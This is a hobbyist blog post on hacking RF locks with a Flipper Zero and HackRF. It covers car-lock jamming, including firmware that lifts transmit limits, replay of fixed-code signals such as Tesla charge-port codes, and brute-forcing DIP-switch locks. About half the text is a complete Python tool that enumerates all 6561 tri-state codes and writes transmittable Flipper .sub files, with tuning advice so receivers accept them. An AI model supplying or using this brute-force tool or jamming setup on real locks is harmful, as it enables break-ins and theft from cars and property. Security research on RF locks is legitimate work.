Chaos-Sec-Lab
Friday, October 20, 2023
Grand Theft Auto – RF Locks Hacking Flipper-Zero Edition Part 1
0x00. INTRODUCTION
I believe that when people are new to hacking RF lock systems, one of the most common questions they ask is which tools they need. Usually I would say a HackRF is a must-have tool. Until recently, the Flipper Zero had become one of the most popular gadgets among RF hackers. To be honest, the first time I heard about the Flipper Zero, I was not that impressed. I already owned a bunch of wireless hacking tools, such as the Proxmark3, YARD Stick One and HackRF with PortaPack. Why should we get another toy that provides similar functions? Soon I learned that I was wrong about it. For instance, beyond its rich wireless capability, the Flipper Zero also supports extension modules through its GPIO header. This feature makes the Flipper Zero a LEGO set for hackers ;)
(After a two-hour wait in the queue, I finally got one at DEFCON 31)
This article is a beginner's journey into RF lock system hacking, performed with the Flipper Zero and other RF hacking tools. I hope each case study helps people get a better idea of what they would need for hacking RF locks.
0x01. SIGNAL JAMMING
One of the easiest yet most effective RF attack techniques is called signal jamming. The attacker constantly transmits noise on the same frequency channel as the target, so that the receiver cannot pick out the legitimate signal. Jamming essentially disrupts communication between two or more devices by shouting louder. It does not matter what you shout, as long as the others cannot hear each other. Because it attacks the channel rather than the message, jamming works just as well against rolling-code fobs as against fixed-code ones; no knowledge of the protocol is required.
(Jamming signals on the spectrum diagram)
Jamming attacks against car locks are also a favorite of thieves. Criminals use hidden jamming equipment to prevent car owners from locking their cars. Once the owner walks away, they can simply open the door and steal whatever was left inside. Although signal jamming is not a new concept, it continues to grow in popularity among criminals as the equipment becomes more sophisticated and easier to obtain.
Below is a video demonstration of the car jamming attack with a HackRF. The video shows how effective the attack is. Please confirm that the car actually locked (lights flash, handle does not open) before you leave, rather than trusting the button press.
Although the Flipper Zero ships with regional restrictions on which Sub-GHz frequencies it will transmit on, installing a custom firmware (Xtreme) removes this limit. This makes the Flipper Zero well suited for experimenting with the jamming attack.
(Source from @McSHUR1KEN)
0x02. SIGNAL REPLAY BLINDLY
Of course, it would be cooler if we could control the target. The replay attack is one of the oldest tricks in the book and achieves exactly that. Most RF lock systems operate in the 315 MHz (North America) or 433 MHz (Europe and Asia) bands, and some of them still use a fixed-code mechanism, so the same transmission unlocks the target every time. This means we can just leave a capture device near the target and wait patiently. With a bit of luck we catch the unlock signal and replay it later.
This is a lot like fishing, except the reward is an unlock signal. Below is a video demonstration of the replay attack with a HackRF. As you can see in the video, it works like a charm.
Interestingly, Tesla's charge port opener still uses a fixed-code mechanism. People can download pre-recorded Tesla charge port files to the Flipper Zero and pop the charge port on other owners' cars without understanding what is really going on behind the scenes.
(Source from @takeapart)
0x03. SIGNAL REPLAY ANALYZE
Blindly replaying a signal is not going to satisfy a hacker for long. Unlike the jamming attack, if we want to get to know the target better we need to find out its operating frequency, modulation and encoding scheme, the encoder chip it uses, and so on. For example, we can learn the operating frequency with the Frequency Analyzer application in the Flipper Zero's Sub-GHz menu: press the fob next to the Flipper and it reports the strongest signal it sees.
(Source from a good amigo)
0x04. SIGNAL REPLAY BRUTEFORCE
Have you ever wondered whether those fixed-code lock systems are brute-forceable? Here is an interesting lock: it comes with 8 DIP switches on both the lock and the keyfob, and each switch can be set up, center or down, so the code is a tri-state value. With three positions per switch that gives 3^8 = 6561 possible combinations, which is small enough to sweep over the air in a matter of minutes.
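To make the size of that keyspace concrete, here is an added example (my own code, not from the original post) that enumerates every tri-state DIP combination, encodes each one as an OOK pulse train, estimates the total airtime of a sweep, and emits a Flipper Zero RAW `.sub` file for any one code. The page does not name the encoder chip, so the waveform is an assumption modelled on the common PT2262-style tri-state encoding (each symbol sent as two high/low pulse pairs plus a sync gap); the 350 µs unit time, the 433.92 MHz frequency and the four repeats per code are likewise assumed and should be replaced with what you measure from the real fob.

```python
import itertools

# Each DIP switch has three positions (down, up, center), i.e. one tri-state
# symbol. We label them '0', '1' and 'F' (floating/center).
TRI_STATE = "01F"

# ASSUMED PT2262-style encoding (the page does not name the chip):
# every symbol is sent as two pulse pairs, each pair being a high then a low.
#   '0' pair = 1 unit high, 3 units low
#   '1' pair = 3 units high, 1 unit low
#   symbol '0' = pair 0, pair 0   symbol '1' = pair 1, pair 1   symbol 'F' = pair 0, pair 1
SYMBOL_PAIRS = {"0": "00", "1": "11", "F": "01"}
SYNC_LOW_UNITS = 31  # frame ends with 1 unit high and a 31-unit low gap


def keyspace(n_switches=8):
    """Every DIP-switch combination as a string over '0', '1', 'F'."""
    return ["".join(c) for c in itertools.product(TRI_STATE, repeat=n_switches)]


def encode(code, unit_us=350):
    """One frame as a pulse list: +N = high for N us, -N = low for N us."""
    pulses = []
    for sym in code:
        for pair in SYMBOL_PAIRS[sym]:
            if pair == "0":
                pulses += [unit_us, -3 * unit_us]
            else:
                pulses += [3 * unit_us, -unit_us]
    pulses += [unit_us, -SYNC_LOW_UNITS * unit_us]  # sync gap
    return pulses


def frame_duration_us(pulses):
    """Airtime of one frame in microseconds."""
    return sum(abs(p) for p in pulses)


def to_flipper_sub(pulses, freq_hz=433_920_000, repeats=4):
    """Flipper Zero RAW .sub text; the frame is repeated as a real fob would."""
    raw = " ".join(str(p) for p in pulses * repeats)
    return "\n".join([
        "Filetype: Flipper SubGhz RAW File",
        "Version: 1",
        f"Frequency: {freq_hz}",
        "Preset: FuriHalSubGhzPresetOok650Async",
        "Protocol: RAW",
        f"RAW_Data: {raw}",
    ]) + "\n"


def bruteforce_seconds(n_switches=8, unit_us=350, repeats=4):
    """Worst-case airtime to transmit every code `repeats` times back to back."""
    n_codes = len(TRI_STATE) ** n_switches
    # every symbol is 8 units regardless of value, so any code has the same duration
    per_code_us = frame_duration_us(encode("0" * n_switches, unit_us)) * repeats
    return n_codes * per_code_us / 1_000_000


if __name__ == "__main__":
    codes = keyspace()
    print(f"{len(codes)} codes, ~{bruteforce_seconds() / 60:.1f} min for a full sweep")
    # Example .sub for one assumed switch setting (constructed, not a real capture)
    print(to_flipper_sub(encode("01F01F01"), repeats=1))
```

Each `.sub` file can be transmitted from the Flipper's Sub-GHz menu, or the pulse lists can be fed to any OOK transmitter. Once you have recorded a real frame with the Flipper's Read RAW mode, compare its timings against `encode()` and adjust the unit time and sync gap first; an otherwise correct code with wrong timing will simply be ignored by the receiver.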
0x05. SUMMARY
In this article we have looked at the common methods of RF lock hacking. In Part 2 we are going to look at more advanced and interesting RF lock hacking techniques. Stay tuned.